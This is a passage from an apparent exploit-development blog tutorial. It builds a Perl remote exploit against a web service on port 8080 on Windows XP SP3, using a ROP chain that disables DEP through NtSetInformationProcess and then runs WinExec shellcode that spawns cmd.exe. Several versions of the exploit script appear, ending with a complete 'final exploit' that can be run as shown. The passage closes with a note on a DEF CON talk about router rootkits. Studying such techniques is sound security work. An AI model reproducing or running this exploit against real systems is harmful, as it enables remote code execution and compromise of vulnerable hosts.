$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x7ca6f081); # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

$exploit .= "A"x424;

$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)

$exploit .= "A"x104;

$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

Now that we’ve disabled DEP, we need to execute our shellcode.  This particular ROP chain will immediately transfer execution to the top of the stack after its completion, which can be observed by studying the last few gadgets.

At the time of the final gadget’s (“pushad; dec ebx; mov ebx, 0x33c233f6; ret”) execution, the function pointer we wish to call (NtSetInformationProcess) resides in EBP.  By referencing the documentation of the PUSHAD instruction, we can see that EBP is pushed onto the stack sixth out of eight registers, placing it at offset 0×8 from the top of the stack:

ELSE (* OperandSize = 32, PUSHAD instruction *)
   Temp := (ESP);
   Push(EAX);
   Push(ECX);
   Push(EDX);
   Push(EBX);
   Push(Temp);
   Push(EBP);
   Push(ESI);
   Push(EDI);
FI;

The next two instructions in the gadget (“dec ebx; mov ebx, 0x33c233f6″) are inconsequential and can be safely ignored.  As we can see, the PUSHAD instruction also results in pushing the ESI and EDI registers above EBP on the stack, which both contain the pointer 0x77e3cb79.

This pointer is actually another gadget to be executed (twice), but unlike other gadgets which perform any number of potentially complex operations, this one is simply a single RET instruction:

This particular gadget is referred to as a “ROP NOP,” similar to how the NOP (No-OPeration) instruction in x86 simply “does nothing”.  When utilized in a ROP chain, we can simply slide down the stack, returning into gadgets that “do nothing” until we reach an interesting pointer.  In this case, we execute two ROP NOPs until we return into the NtSetInformationProcess pointer to disable DEP.

Upon completion of the function, we return into the next dword on the stack.  Referencing the PUSHAD documentation once again, we see that the register pushed immediately before EBP was the value of ESP before the operation.  This is excellent, because by returning into this value we transfer execution directly to stack memory adjacent to the ROP chain itself, which at the moment is just our placeholder of a bunch of “A”s:

All we have to do from this point is stash some shellcode immediately after the ROP chain and we’ll have our shell.  We can grab a simple WinExec shellcode here.  Update our exploit:

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 ";
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes

$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x7ca6f081); # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

$exploit .= "\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8\x8d\x15\x86\x7c\xff\xd0";

$exploit .= "A"x(424-23);

$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)

$exploit .= "A"x104;

$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

So are we finished?  God, no.

We need to do a little refactoring of this shellcode before we can use it.  The hardcoded WinExec address it uses is not correct for XP SP3, so we first need to update it with the correct address 0x7c86250d:

\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8\x0d\x25\x86\x7c\xff\xd0

However, this presents another problem.  The true WinExec address has the bad char 0×25 in its address, and it doesn’t seem immediately feasible to jump to a nearby address without the offending byte due to the RET:

So let’s tack on a couple more bytes to our shellcode.  Instead of directly MOVing &WinExec to EAX, we can be tricky and MOV the two’s complement of the function pointer and NEG (negate) it.  The disassembly of our new shellcode will look like this:

02CDFA7C   8BEC             MOV EBP,ESP
02CDFA7E   68 65786520      PUSH 20657865
02CDFA83   68 636D642E      PUSH 2E646D63
02CDFA88   8D45 F8          LEA EAX,DWORD PTR SS:[EBP-8]
02CDFA8B   50               PUSH EAX
02CDFA8C   B8 F3DA7983      MOV EAX,8379DAF3
02CDFA91   F7D8             NEG EAX
02CDFA93   FFD0             CALL EAX

This is our final exploit:

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 ";
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes

$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x7ca6f081); # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

$exploit .= "\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8\xf3\xda\x79\x83\xf7\xd8\xff\xd0";

$exploit .= "A"x(424-25);

$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)

$exploit .= "A"x104;

$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

And let ‘er rip:

Obviously we’re only able to spawn a shell locally (on the remote system), but the techniques necessary to write the appropriate network-capable shellcode without using any of our nine bad chars with size considerations may be better suited for a separate post.  Or we could just use a stager.

SCADA Wars Episode 3 – Revenge of ASLR

A (hopeful) part three will discuss the implications of ASLR in the target environment, disallowing the use of hardcoded addresses in our exploit.

DEF CON 20 Presentation

By the way, I will be presenting “Owning the Network: Adventures in Router Rootkits” this Sunday, 12 noon at DEF CON 20.  If you enjoy ownage, networks, adventures, routers, and rootkits, this talk is for you. I’ll be releasing my firmware generation/manipulation framework at the talk, which will be made available on the site shortly afterwards.  Slides and (hopefully) video will be available as well.

Post-conference update:

Download slides: owning-the-network-adventures-in-router-rootkits.pdf
Download rpef: https://github.com/mncoppola/rpef